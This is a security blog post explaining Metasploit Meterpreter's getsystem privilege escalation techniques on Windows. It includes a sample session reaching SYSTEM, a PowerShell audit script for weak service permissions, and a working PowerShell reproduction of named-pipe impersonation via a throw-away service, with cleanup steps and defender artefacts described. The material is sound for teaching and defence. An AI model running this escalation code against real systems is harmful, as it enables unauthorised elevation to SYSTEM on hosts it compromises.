A few weeks ago Chris Gates (Attack Research / Carnal0wnage) and Joshua Gauthier showed some quick snippets of Metasploit's getsystem command. getsystem is Meterpreter's new Windows privilege escalation command, provided by the priv extension.
Getsystem uses several techniques for privilege escalation:
- Named pipe impersonation via a service (techniques 1 and 2 in the help output below): a service is created that connects back to a named pipe owned by the Meterpreter process, and the pipe server impersonates its SYSTEM client. This requires an Administrator-level session to begin with.
- Token duplication (technique 3): duplicating an existing SYSTEM token from an Administrator context. The related attacks on Windows impersonation tokens were fixed by MS09-012, so an Administrator session is again a prerequisite.
- Exploiting weak service permissions: most services run as SYSTEM by default, and if you are lucky one runs as a domain administrator account.
- KiTrap0D (CVE-2010-0232), released by Tavis Ormandy, the only technique of the four that works from an unprivileged user; patched by MS10-015.
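The weak-service-permissions case in the list above is easy to audit by hand. The following PowerShell script is an added example, not code from the original post or from Metasploit: it walks every installed service and flags those whose binary or binary directory is writable by a low-privileged principal, whose service DACL (read with sc.exe sdshow) grants a low-privileged SID ChangeConfig, WriteDAC, WriteOwner or Delete, or whose path is unquoted and contains spaces, and reports the account each one runs as. The list of principals it treats as low-privileged and the set of SDDL rights it considers dangerous are my choices for the demo.

```powershell
# Added example (not Metasploit's code): audit services for weak permissions.
# Runs as a normal user; uses only WMI, Get-Acl and sc.exe sdshow.

# Principals a low-privileged attacker controls, as account names (for file ACLs)
# and as SDDL shorthand / well-known SIDs (for service DACLs). Demo choice.
$LowPrivNames = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
$LowPrivSids  = @('WD', 'BU', 'AU', 'IU', 'S-1-1-0', 'S-1-5-32-545', 'S-1-5-11', 'S-1-5-4')
# SDDL service rights that let the holder retarget or replace the service:
# DC = SERVICE_CHANGE_CONFIG (binPath), WD = WRITE_DAC, WO = WRITE_OWNER, SD = DELETE, GA/GW = generic all/write.
$DangerousRights = @('DC', 'WD', 'WO', 'SD', 'GA', 'GW')

function Get-ServiceBinaryPath {
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    if ($PathName.StartsWith('"')) { return $PathName.Split('"')[1] }
    # Unquoted path: accumulate tokens until the prefix names an existing file.
    $parts = $PathName -split ' '
    for ($i = 0; $i -lt $parts.Count; $i++) {
        $candidate = ($parts[0..$i] -join ' ')
        if (Test-Path -LiteralPath $candidate -PathType Leaf) { return $candidate }
        if (Test-Path -LiteralPath "$candidate.exe" -PathType Leaf) { return "$candidate.exe" }
    }
    return $parts[0]
}

function Test-LowPrivWritable {
    param([string]$Path)
    if (-not $Path -or -not (Test-Path -LiteralPath $Path)) { return $false }
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    $writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
                 [System.Security.AccessControl.FileSystemRights]::Modify -bor
                 [System.Security.AccessControl.FileSystemRights]::FullControl
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivNames -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band [int]$writeMask) -ne 0) { return $true }
    }
    return $false
}

function Test-WeakServiceDacl {
    param([string]$Name)
    # sc sdshow prints one SDDL string, e.g. D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;...;;;BA)S:(AU;FA;...;;;WD)
    $sddl = (& sc.exe sdshow $Name 2>$null | ForEach-Object { $_.Trim() } | Where-Object { $_ -match '^D:' }) -join ''
    if (-not $sddl) { return $false }
    foreach ($match in [regex]::Matches($sddl, '\(([^)]*)\)')) {
        $fields = $match.Groups[1].Value -split ';'
        # ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid
        if ($fields.Count -lt 6 -or $fields[0] -ne 'A') { continue }   # only Allow ACEs
        $rights, $sid = $fields[2], $fields[5]
        if ($LowPrivSids -notcontains $sid) { continue }
        if ($rights -match '^0x') { continue }                          # hex masks not decoded here
        for ($i = 0; $i + 1 -lt $rights.Length; $i += 2) {              # rights are two-letter codes
            if ($DangerousRights -contains $rights.Substring($i, 2)) { return $true }
        }
    }
    return $false
}

$report = foreach ($svc in Get-WmiObject -Class Win32_Service) {
    $bin = Get-ServiceBinaryPath $svc.PathName
    if (-not $bin) { continue }
    $issues = @()
    if ($svc.PathName -notmatch '^"' -and $bin -match ' ') { $issues += 'unquoted path with spaces' }
    if (Test-LowPrivWritable $bin)                          { $issues += 'binary writable' }
    if (Test-LowPrivWritable (Split-Path $bin -Parent))     { $issues += 'binary directory writable' }
    if (Test-WeakServiceDacl $svc.Name)                     { $issues += 'weak service DACL' }
    if ($issues) {
        [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; Binary = $bin; Issues = ($issues -join ', ') }
    }
}
$report | Sort-Object RunsAs | Format-Table -AutoSize
```

Any hit whose RunsAs column is LocalSystem is a direct path to SYSTEM; a hit running as a domain account is the one worth prioritising. The SDDL check only decodes the two-letter rights shorthand; services whose DACL uses raw hex masks need a manual look.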
As more privilege escalation exploits appear this year they will no doubt be rolled into the getsystem command, which I will be keeping a watchful eye on. Thanks to Stephen Fewer for adding the new functionality to getsystem.
Below is a sample session from Pieter Danhieux showing the priv extension's getsystem help output and a successful elevation via technique 1 (named pipe impersonation); note that this is the getsystem path, not the KiTrap0D exploit:
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem -h
Usage: getsystem [options] Attempt to elevate your privilege to that of local system.
-h Help Banner.
-t The technique to use. (Default to '0').
0 : All techniques available
1 : Service - Named Pipe Impersonation (In Memory/Admin)
2 : Service - Named Pipe Impersonation (Dropper/Admin)
3 : Service - Token Duplication (In Memory/Admin)
4 : Exploit - KiTrap0D (In Memory/User)
meterpreter > getsystem -t 1
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
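Technique 1 in the session above, Service - Named Pipe Impersonation, is short enough to reproduce outside Meterpreter. The PowerShell below is an added example, not Metasploit's code: it opens a named pipe, registers a throw-away service whose "binary" is a cmd.exe one-liner that writes to that pipe (services run as LocalSystem unless told otherwise, so the pipe client is SYSTEM), reads the client's bytes and then impersonates the client with the .NET pipe class's RunAsClient, reporting the identity seen inside the impersonation. The service and pipe names are generated for the demo, and, as with getsystem's "Admin" techniques, it assumes an elevated session, since creating a service requires it.

```powershell
# Added example (not Metasploit's code): the mechanics of getsystem technique 1.
# Requires an Administrator PowerShell session, like the getsystem technique it mirrors.
# Service name and pipe name below are arbitrary, constructed for this demo.

function Invoke-NamedPipeImpersonationDemo {
    param(
        [string]$PipeName    = ('demo-' + [guid]::NewGuid().ToString('N')),
        [string]$ServiceName = ('demosvc-' + [guid]::NewGuid().ToString('N').Substring(0, 8))
    )

    # 1. Open the pipe server in our (Administrator) context and start waiting for a
    #    client before the service exists, so the connection can never be missed.
    $server = New-Object System.IO.Pipes.NamedPipeServerStream(
        $PipeName,
        [System.IO.Pipes.PipeDirection]::InOut,
        1,
        [System.IO.Pipes.PipeTransmissionMode]::Byte,
        [System.IO.Pipes.PipeOptions]::None)
    $pending = $server.BeginWaitForConnection($null, $null)

    try {
        # 2. Register a service whose command line is cmd.exe redirecting into our pipe.
        #    No obj= is given, so the SCM launches it as LocalSystem. cmd.exe never talks
        #    to the SCM, so "sc start" ends with error 1053 after the SCM timeout (up to
        #    ~30 s); that is expected, the echo has already reached the pipe by then.
        $binPath = "cmd.exe /c echo hello > \\.\pipe\$PipeName"
        & sc.exe create $ServiceName binPath= $binPath type= own start= demand | Out-Null
        & sc.exe start $ServiceName 2>&1 | Out-Null

        # 3. Complete the connection and read what the client wrote. Windows refuses to
        #    impersonate a pipe client until the server has read from the pipe.
        $server.EndWaitForConnection($pending)
        $buffer = New-Object byte[] 64
        $null = $server.Read($buffer, 0, $buffer.Length)

        # 4. Impersonate the client for the duration of the script block. Inside it the
        #    thread token is the service's, so GetCurrent() reports NT AUTHORITY\SYSTEM.
        $seen = New-Object System.Collections.Generic.List[string]
        $server.RunAsClient({
            $seen.Add([System.Security.Principal.WindowsIdentity]::GetCurrent().Name)
        })
        return $seen[0]
    }
    finally {
        # 5. Clean up: drop the pipe and delete the service. Forgetting this step is how
        #    exploitation tooling leaves forensic artefacts behind.
        $server.Dispose()
        & sc.exe delete $ServiceName | Out-Null
    }
}

"Caller : $([System.Security.Principal.WindowsIdentity]::GetCurrent().Name)"
"Client : $(Invoke-NamedPipeImpersonationDemo)"
```

RunAsClient only impersonates for the script block; to keep the SYSTEM context, as getsystem does, the impersonation token would additionally be duplicated to a primary token and handed to CreateProcessWithTokenW, which needs P/Invoke and is left out here. From the defender's side, the artefacts are a service creation event (System log 7045) with cmd.exe as the image path and a 1053 start failure immediately after it.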